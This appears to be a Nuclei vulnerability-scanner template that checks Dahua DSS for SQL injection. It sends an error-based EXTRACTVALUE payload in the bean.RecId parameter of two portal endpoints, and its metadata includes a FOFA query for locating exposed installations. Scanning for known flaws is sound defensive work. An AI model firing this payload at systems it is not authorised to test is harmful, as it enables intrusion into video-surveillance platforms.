id: CNVD-2017-06001

info:
  name: Dahua DSS - SQL Injection
  author: napgh0st,ritikchaddha
  severity: high
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
  metadata:
    verified: true
    max-request: 2
    fofa-query: "app=\"dahua-DSS\""
  tags: cnvd,cnvd2017,sqli,dahua
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
      - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "XPATH syntax error:"
          - "c8c605999f3d8352d7bb792cf3fdb25"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402201473c48150a393eeb0801323af0b0e94147a66a15315b3c0cb476027ce5f6c880220684bd14e88b482a6ed2d4707b2bef6916911ba91ca0cb9fe97f6396c14476607:922c64590222798bb761d5b6d8e72950